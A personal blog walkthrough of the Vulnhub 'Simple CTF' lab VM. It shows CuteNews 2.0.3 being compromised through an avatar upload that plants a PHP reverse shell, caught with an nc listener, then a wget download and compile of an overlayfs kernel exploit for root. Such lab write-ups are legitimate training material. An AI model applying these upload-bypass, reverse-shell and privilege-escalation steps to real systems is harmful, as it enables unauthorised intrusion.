Posted in Penetration Testing, web app testing

SecTalks: BNE0x03 Simple CTF

Hosted by: Vulnhub
Created by: @RobertWinkel (Bull)


 

I had a lot of trouble trying to get this VM to get a DHCP lease. For some reason VirtualBox was broken so in trying this, I also managed to fix VB too.

After all the shenanigans I was able to get an IP for the Simple CTF box. Great! A quick nmap scan then.

nmap -sS 10.0.2.6 -A

nmapScan

We see that port 80 is open. It’s running Apache on Ubuntu and with the http-title “Please login / CuteNews” Ok why not?

WebsiteLogin

Not much to look at here. I created an account with the credentials test:test. Logged in to the portal and started looking around. I navigated to the ‘Help/About’ page where I was met with a pop up box alerting me to the fact that Cute News v2.0.3 was out of date and I had to upgrade due to security issues.

cuteNewserror

This is great news for a trainee Pen Tester. It actually tells me what I need to do next.
I instantly fire off to Google and search for ” CuteNews v2.0.3 exploit” Low and behold, a lovely exploit-db link for me to go into (after I clicked on a few others of course).

CuteNews 2.0.3 – Arbitrary File Upload Vulnerability

I read through every wee detail, however, it started to sound a lot like a reverse-php shell situation. I was very excited indeed.

Carving the exploit

The details of the exploit reveal that an account must be created, and you need to upload an evil.jpg as an avatar image, use Tamper Data to change evil.jpg to evil.php. I’ve used Tamper Data before, but I wanted to try Burpsuite for this.

Using the excellent PHP-Reverse-Shell from Pentest Monkey I edited the file to linkback to my Kali box IP and saved it as Evil.JPG. Didn’t need to use Evil, but it’s fitting.

After that, I opened Burpsuite and proxied the CuteNews site through Burpsuite. Details of that can be found all over the net. I set the stage so that I just had to hit ‘Save Changes’ on the Cute News Profile Page. Burp caught the request before it was sent to the web server.

BurpGrab

As you can see it has the uploaded file in the request. Just take out the .jpg part and replace it with .php and hit ‘Forward’ on the menu bar. The Burpsuite part is done for now so close it all down as it causes problems later when we get shell. Trust me.

Where did the upload go?

At this point we have no way of calling our Evil.php file so we need to find a way to get to the URL. This is where DIRB comes in handy. CTRL+ALT+T for  a new terminal tab and type in.

dirb http://10.0.2.6

This will use common wordlists to map a websites directories. It’s a lot quicker than DirBuster. We get some results.

dirb

I initially fired over to the /docs/ folder, however, the file wasn’t there. Funnily enough it was in the /uploads/ folder.

avatarLocation

The webserver renamed the file to ‘avatar_test_evil.php’ Not a big deal. Before we click on the newly uploaded PHP-Shell we need to create a listener on our machine to create the connection from the CuteNews Server.

nc -lnvp 1234

Port 1234 was the port defined in the Evil.php shell script we uploaded. Within a few seconds of us clicking the ‘avatar_test_evil.php’ we have a remote shell to the server.

shell

Excellent! I really do love this method a lot. I like to create a bash style shell so I type this into the prompt once I’m in.

python -c ‘import pty;pty.spawn(“bin/bash”)’

This just creates a bash shell for use to make it easier to identify where we are in the directory structure.

Privilege Escalation

We are shell on the server as www-data an Apache own limited user with limited functionality and options. No good. We need to gain higher privileges. This test was starting to go along the lines of a previous VM I did, Droopy. I checked the version if Ubuntu.

lsb_release -a

Wow it was the exact same version of Ubuntu ‘Ubuntu 14.04.2 LTS Z codename: trusty’
I just went along with it and went into gung-ho mode. I used an exploit for priv-esc on Droopy so I thought I’d give it a try again.

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) – overlayfs Local Root Shell

Navigating to the /tmp/ directory I ran this command in shell on the server

wget https://exploit-db.com/download/37292

I also did the following after I downloaded 37292.

  • mv 37292 37292.c
  • gcc 37292.c -o rootMe
  • chmod +x rootMe
  • ./rootMe

4 command lines later and we have a root shell.

GotRoot

A quick ‘cd /root/’ and then a ‘cat flag.txt’ and we had the flag!!

flag

Excited!!

After the initial VirtualBox trouble I had with this one I was really quite surprised when I popped Root on the box. Apart from going to Exploit-DB for the initial exploit I did this one all on my own and that’s a great feeling indeed.

It took me longer to write this post than it took to get Root on the server.

Thanks again to Vulnhub and Robert Winkel for this VM.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s